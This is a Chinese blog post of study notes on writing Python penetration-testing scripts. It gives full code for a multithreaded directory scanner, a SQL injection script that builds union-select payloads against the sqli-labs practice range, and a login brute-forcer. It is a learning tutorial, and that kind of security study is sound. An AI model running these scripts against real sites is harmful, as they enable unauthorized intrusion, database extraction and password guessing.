Python渗透脚本学习笔记

最新推荐文章于 2024-05-03 14:56:49 发布
最新推荐文章于 2024-05-03 14:56:49 发布
阅读量4.8k 收藏 29
点赞数 3
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45675619/article/details/124019750
版权

Python脚本编写

前言

最近在B站上学习有关Python编写渗透脚本课程,此篇仅作为学习笔记,代码大部分来自课程讲解,不懂的地方建议看课程或者上网有关语法
课程链接

前期准备

对于Python语言有一定了解(当时学的时候我也没有系统学过Python。。)
安装好Pycharm并导入有关库requests、optparse等
简单介绍下
requests作用是获取网络请求
optparse可以用于自定义命令参数并处理

脚本代码

目录扫描

下面是 文件读取代码,dic.txt是准备的目录字典。

with open("dic.txt","r") as f:
    line_list = f.readlines()
    print(len(line_list))
    print(type(line_list))
    for line in line_list:
        print(line.strip())

下面是完整代码,结果根据状态响应码返回存在的路径

import getopt
import sys
import math
import threading
import requests

def banner():#工具介绍函数
    print("*"*50)
    print("*"*2+" "*16+"Dirbrute v1.0"+" "*17+"*"*2)
    print("*"*50)
    print("This tool just code for dirsearch")

#python Dirbrute -u url -t thread -d dictionary

def usage():#使用方法说明函数
    print("This is the tool's usage")
    print("python Dirbrute.py -u url -t thread -d dictionary")

usage()

# opts , args = getopt.getopt(sys.argv[1:],"u:t:d:")
# for k,v in opts:
#     print(k)
#     print(v)
# print(type(opts))
# print(opts)
# print(type(args))
# print(args)

def start():
    if len(sys.argv) == 7:
        opts , args =getopt.getopt(sys.argv[1:],"u:t:d:")
        for  k,v in opts:
            if k == "-u":
                url = v
            elif k == "-t":
                threads = v
            elif k == "-d":
                dic = v
        # print("url: "+url)
        # print("threads: "+threads)
        # print("dic: "+dic)
        multi_scan(url,threads,dic)
    else:
        print("Error Argument!")
        sys.exit()

def multi_scan(url,threads,dic):
    #第一步读取字典文件
    #第二步确定读取的行数
    #第三步确定每一个线程读取的字典列表[[t1],[t2],[t3]]
    result_list = []
    threads_list = []
    with open(dic,"r") as f:
        dic_list = f.readlines()
        thread_read_line_num = math.ceil(len(dic_list) / int (threads))
        #结果向上取整
        i = 0
        temp_list = []
        for line in dic_list:
            i = i + 1
            #print((str(i)+":"+line).strip())
            if i % thread_read_line_num == 0 :
                temp_list.append(line.strip())
                result_list.append(temp_list)
                temp_list = []
            else:
                temp_list.append(line.strip())

        result_list.append(temp_list)#这里需要补上,否则最后几行还停留在temp_list中

        for i in result_list:
            threads_list.append(threading.Thread(target=scan,args=(url,i)))
        for t in threads_list:
            t.start()

def scan(url,dic):
    #这里实现扫描功能
    for line in dic:
        r = requests.get(url+'/'+line)
        if r.status_code == 200:
            print(r.url+" : "+str(r.status_code))



    # print(result_list)


start()

在这里插入图片描述

SQL注入

这里目标是sqli-labs-master靶场,也可以将Parameters改成别的
在这里插入图片描述

下面展示SQL注入脚本代码
功能包括读取字典,order by探测字段数,union探测(基于表名、列名字典)

import optparse
import requests
parser = optparse.OptionParser()
parser.usage = "sqlinjector.py -u url -i inject_fuzz.txt"
parser.add_option("-u","--url",dest="url",help="url to test sql",action="store",type="string",metavar="URL")
parser.add_option("-i","--inject",dest="inject_file",help="fuzz filename",action="store",type="string",metavar="FUZZFILE")
(options,args) = parser.parse_args()

url = options.url
fuzz_file = options.inject_file
# print(url)
# print(fuzz_file)

def get_urls():
    urls = []
    with open(fuzz_file,"r") as f:
        payload_list = f.readlines()#每一项都有反斜杠,需要strip
        for payload in payload_list:
            payload = payload.strip()
            urls.append(url.replace("FUZZ",payload))
    return urls

inject_urls = get_urls()
for item in inject_urls:
    print(item)

result_list = [] #存储注入成功的列表
is_injectable = []
def test_sql():
    print("testing url:")
    for item in inject_urls:
        r = requests.get(url=item)
        print(r.url)
        result = r.text
        if result.find("SQL syntax")!=-1: #存在SQL注入
            is_injectable.append(True)
            result_list.append(r.url)

test_sql()
if result_list == 0:
    print("no sql inject")
else:
    print("exist sql inject")
    for item in result_list:
        print(item)


def detect_columns_num(): #探测字段数 order by
    i = 0
    while i<100:
        i = i + 1
        temp_url = url.replace("FUZZ","1'+order+by+"+str(i)+"+--+")
        r = requests.get(temp_url)
        print(r.url)
        if r.text.find("Unknow") == -1:
            continue
        else:
            break
    return i-1

if len(is_injectable) > 0:
    column = detect_columns_num()
    print("find this table has "+ str(column) + " column")

table_result = []
def detect_table_name(): #构造union注入
    u = ""
    for i in range(column):
        u = u + str(i+1) + ","
    u = u[0:len(u)-1]    #去除最后的逗号
    table_list = ["admin","admin123","root","adminstrator","users","emails","referers"]
    for table_name in table_list:
        temp_url = url.replace("FUZZ","-1'+union+select+"+u+"+from+"+ table_name + "+--+")
        r = requests.get(temp_url)
        key = "doesn't exist"
        if r.text.find(key) == -1: #没有找到
            table_result.append(table_name)

if len(is_injectable) > 0:
    detect_table_name()
    print("Find these table_name in DB ")
    for table in table_result:
        print(table)


column_result = []
def detect_column_name():
    key = "Unknown column"
    u = ""
    for i in range(column):
        u = u + str(i + 1) + ","
    u = u[0:len(u) - 1]  # 去除最后的逗号  u=[1,2,3]
    #conlumn_content是自己准备的字典
    column_content = ["id","user","admin","password","users","email_id"]
    for table in table_result:
        for line in column_content:
            temp_url = url.replace("FUZZ","-1'+union+select+"+u.replace("2",line)+"+from+"+table+"+--+")
            r = requests.get(temp_url)
            print(r.url) #打印验证一下payload
            if r.text.find(key) == -1:
                column_result.append(line) #到这里还缺乏表与列的对应关系
        #else:
        column_result.append(table) #[column,table]

if len(is_injectable) > 0:
    detect_column_name()
    print("Find these column name")
    print(table_result)# 探测存在的表名集
    print(column_result)# 探测存在的表名和列名集
    for line in column_result:
        if line not in table_result:
            print(line)
        else:
            print("上边的内容是该表对应的字段名" + line)

下面是同目录下的测试语句字典fuzz_sql.txt
在这里插入图片描述
结果如下
在这里插入图片描述

简单爆破

直接上代码,原课程这一块讲解存在问题,以后有机会再改进

import optparse
import math
import threading
import requests

parser = optparse.OptionParser()
parser.usage = "web_brute_command.py -u url -user user_file -p pass_file -t num"
parser.add_option("-s","--site",dest="website",help="website to test",action="store",type="string",metavar="url")
parser.add_option("-u","--userfile",dest="userfile",help="username from file",action="store",type="string",metavar="USERFILE")
parser.add_option("-p","--passfile",dest="passfile",help="password from file",action="store",type="string",metavar="PASSFILE")
parser.add_option("-t","--threads",dest="threads",help="number of threads",action="store",type="int",metavar="THREADS")
(options,args) = parser.parse_args()
# print(options.website)
# print(options.userfile)
# print(options.passfile)
# print(options.threads)

#payload确定
ths = options.threads
# print(ths)
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.website

#新建一个密码字典列表[[],[],[]]
user_list = []
pass_list = []
result_num = 0
#根据线程数 确定每一项中内容的行数
#第一步读取所有密码字典内容到列表中,确定行数
with open(pass_dic) as f:
    temp_list = f.readlines()
    temp_thread_list = []
    num=len(temp_list)
    #第二步 使用得到的临时列表的项数 除以线程数来确定每一个线程中的项数
    result = num / ths
    # print(temp_list)
    # print(num)
    # print(result)

    #第三步 向上取整 math.ceil 向下取整 math.floor
    result = math.ceil(result)#表示线程要读取的内容行数
    result_num = result
    print(result_num)
    flag = 0
    # for line in temp_list: #这里如果向上取整,会导致有线程用不到
    #     flag = flag + 1
    #     temp_thread_list.append(line.strip())#去掉换行
    #     #print(result)
    #     if flag == result:
    #         flag = 0
    #         pass_list.append(temp_thread_list)
    #         temp_thread_list = []
    # for line in temp_thread_list:#向下取整,视频中这里的处理有问题,数据22时将有11个线程
    #     for i in len(temp_thread_list):
    #      pass_list[i].append(line)

    #改写一下,先别管线程用不上的事情,还是用向上取整,至少线程不会超出
    for line in temp_list:
        flag = flag + 1
        if flag % result == 0:
            temp_thread_list.append(line.strip())
            pass_list.append(temp_thread_list)
            temp_thread_list = []
        else:
            temp_thread_list.append(line.strip())
    pass_list.append(temp_thread_list)

print(pass_list)
print(len(pass_list))

#照搬上面就行
with open(user_dic) as f:
    temp_list = f.readlines()
    temp_thread_list = []
    num=len(temp_list)
    #print(temp_list)
    result = num / ths

    result = math.ceil(result)#表示线程要读取的内容行数
    result_num = result
    print(result_num)

    flag = 0
    #思考为什么会多一个空【】
    for line in temp_list:
        flag = flag + 1
        if flag % result == 0:
            temp_thread_list.append(line.strip())
            user_list.append(temp_thread_list)
            temp_thread_list = []
        else:
            temp_thread_list.append(line.strip())
    user_list.append(temp_thread_list)

print(user_list)
print(len(user_list))

def scan(payload):
    user = payload["user"]
    password = payload["pass_list"]
    r = requests.post(url=site,data={"username":user,"password":password})
    print("url:"+site+":"+"username:"+user+"password:"+password+" "+"length: "+str(len(r.text)))

ths_list = []
with open(user_dic,"r") as f:
    user = f.readlines()
    for user in user_list:
        for pass_line in pass_list:
            payload = {"user:":user,"pass_list:":pass_line}
            print(payload)
            #ths_list.append(threading.Thread(target=scan,args=payload))

# for th in ths_list:
#     th.start()

总结

说白了,这些只是一个入门教程,重点在于学到一些思路。后续可以直接找一些渗透工具的源码来学,方便理解工具的原理。

觉醒白哥
关注
  • 3
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python脚本渗透测试)
weixin_56537388的博客
09-18 371
通过此脚本,可以爬取edusrc的目标信息,生成目标字典,为下一步开发自动化测试工具做准备。
推荐几款渗透测试常用的脚本(记得收藏)
保持微笑的博客
05-02 5952
1.dirsearch目录扫描 2.OneForAll-master资产收集 3.sqlmap 4.awvs批量扫描 5.ip解码 注意:在使用之前将自己的电脑先安装好python2x和python3x的环境。 下载链接: 链接:https://pan.baidu.com/s/1Tz_pd7I6zsrKd5IaXGu6zQ 提取码:wsvu --来自百度网盘超级会员V2的分享 1.dirsearch目录扫描 Dirsearch是一个用于探测WEB服务器下的敏感文件/目录的命令行...
最新python网络渗透之:DOS攻击篇_ddos攻击脚本
2401_84556681的博客
05-03 76
什么是Dos攻击?所谓的DOS攻击就是,即拒绝服务攻击(Denial Service attack),指在通过耗尽目标系统的资源,使其无法提供正常的服务。这种攻击通常会导致系统奔溃、停机或变得不可用。可能我们平常听的最多的是DDOS攻击即分布式拒绝服务攻击(Denial of Service attack),DDOS攻击的本质就是DOS攻击,只不过DOS攻击是单一的网络来源,而DDOS则是多个网络来源。
渗透测试之分享常用工具、插件和脚本(干货)
保持微笑的博客
10-31 3817
BRUP插件:漏洞挖掘插件:Autorize、CSRF Token Tracker、XSS Validator、Turbo Intruder辅助插件:HaE、sqlmap4brup++、hackbar、Software Vulnerability Scanner浏览器插件: wappalyzer、MySSL、Cookie Editor脚本:1.图形化渗透测试工具集——GUI_Tools5.ip解码6.awvs批量扫描。
如何入门渗透测试
m0_59162248的博客
05-09 488
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
python渗透测试---第一章:基础
weixin_45761101的博客
05-21 568
1、
Python_Study Notes For Web Hacking Web安全学习笔记.zip
最新发布
05-24
总的来说,这份学习笔记提供了从基础到进阶的Python Web安全知识体系,适合对Web安全感兴趣或者希望提升自己安全技能的开发者。通过深入学习和实践,你不仅可以理解Web安全的原理,还能掌握实际的防护和攻击技巧。
Web安全学习笔记.pdf
10-22
《Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
Web安全学习笔记
11-03
《Web安全学习笔记》 在当今数字化的时代,Web安全已经成为每一个互联网用户,特别是开发者和网络安全专业人员必须关注的重要领域。Web安全主要涉及保护Web应用程序免受各种攻击,如SQL注入、跨站脚本(XSS)、跨站...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
Python渗透测试之身份认证攻击
waqqy的博客
04-26 3329
目前最为常见的 身份验证模式 采用的仍然是“用户名+密码”的方式,用户自行设定密码,在登录时如果输入正确的密码,计算机就会认为操作者是合法用户。 但是这种认证方式的缺陷也很明显,如何保证密码不被泄露以及不被破解已经成为网络安全的最大问题之一。 本章中将介绍基于Python实现的密码破解。密码破解是指利用各种手段获得网络、系统或资源密码的过程。 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的模式,例如 FTP、Telnet、SSH等,这些应用被广泛地应用在各种网络设备上,如果这些认证模式.
Python渗透测试编程基础——线程、进程与协程
PICACHU+++的博客
04-29 1502
python3进程多线程编程的模块有_thread和threading:①_thread 模块:只提供基本的线程和锁定支持,不能很好的控制线程的运行。(不建议使用)②threading 模块:提供了更高级别、功能更全面的线程管理。threading是常用的模块。返回当前进程返回当前活跃的线程数返回当前线程的线程标识符返图当前活动Thed对象列表返回主Tred对象stack_size(size) | 返回线程栈大小;或为后续创建的线程设定栈大小为size返回线程栈大小;或为后续创建的线程设定。
网络黑客是如何使用python进行渗透测试的
Clihome的博客
02-18 327
1、解释说明: 网络黑客使用Python进行渗透测试主要是通过编写脚本来实现自动化的渗透测试过程。Python有很多第三方库可以帮助他们完成这个任务,例如Scapy、nmap、requests等。这些库可以帮助黑客实现网络扫描、端口扫描、服务识别、漏洞利用等功能。通过编写Python脚本,黑客可以快速地对目标系统进行渗透测试,从而找到潜在的安全漏洞。
Python渗透测试编程技术大全
ada的博客
03-30 1463
Python渗透测试编程技术大全 一、漏洞渗透模块1、测试软件的溢出漏洞(1)栈溢出漏洞发现2、计算软件溢出的偏移地址3、查找JMP ESP指令(1)执行恶意的攻击载荷二、网络嗅探与欺骗1、网络数据嗅探(1)编写一个网络嗅探工具(2)调用WireShark来查看数据包2、ARP的原理与缺陷(1)中间人欺骗(2)中间人欺骗的原理三、拒绝服务攻击1、数据链路层的拒绝服务攻击(1)攻击方式2、网络层的拒绝服务攻击(1)网络层的协议:ARP、IP和ICMP等(2)如何提高发送到目标的数据包的数量3、传输层的拒绝服务
【保姆级】黑客入门教程「Python安全攻防:渗透测试实战指南」经典纯狱风~
wangluo12138的博客
11-28 2005
在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。
Python渗透测试之网络嗅探与欺骗
waqqy的博客
05-01 2634
文章目录网络数据嗅探编写一个网络嗅探工具常见的过滤器。调用WireShark来查看数据包ARP的原理与缺陷中间人欺骗编写一个完整的ARP欺骗程序使用 socket来实现例子 如果想要彻底了解一个网络,那么最好的办法就是对网络中的流量进行 嗅探 在本章中将会编写几个嗅探工具,这些嗅探工具可以用来窃取网络中 明文 传输的密码,监视网络中的数据流向,甚至可以收集远程登录所使用的NTLM数据包(这个数据包中包含登录用的用户名和使用Hash加密的密码) 网络数据嗅探 编写一个网络嗅探工具 在Scapy中提供了一种专
python渗透测试脚本 学习记录(三)
逸琅的博客
05-15 945
python渗透测试脚本——信息收集之爬取邮箱 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。 本人在学习过程中主要参考书籍为《Python安全攻防——渗透测试指南》 渗透测试的过程主要分为: 明确目标 信息收集 漏洞检测 漏洞验证 信息分析 获取所需信息 清楚痕迹 撰写报告 最近的任务就是使用python完成第二项:信息收集 邮件钓鱼攻击是非常常见的一种攻击手法,在使用这种手法进行攻击
Python 渗透测试:黑客内外网信息收集.(帮助 得到信息攻击计算机内外网.)
网络安全领域___专研者.
05-18 1813
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值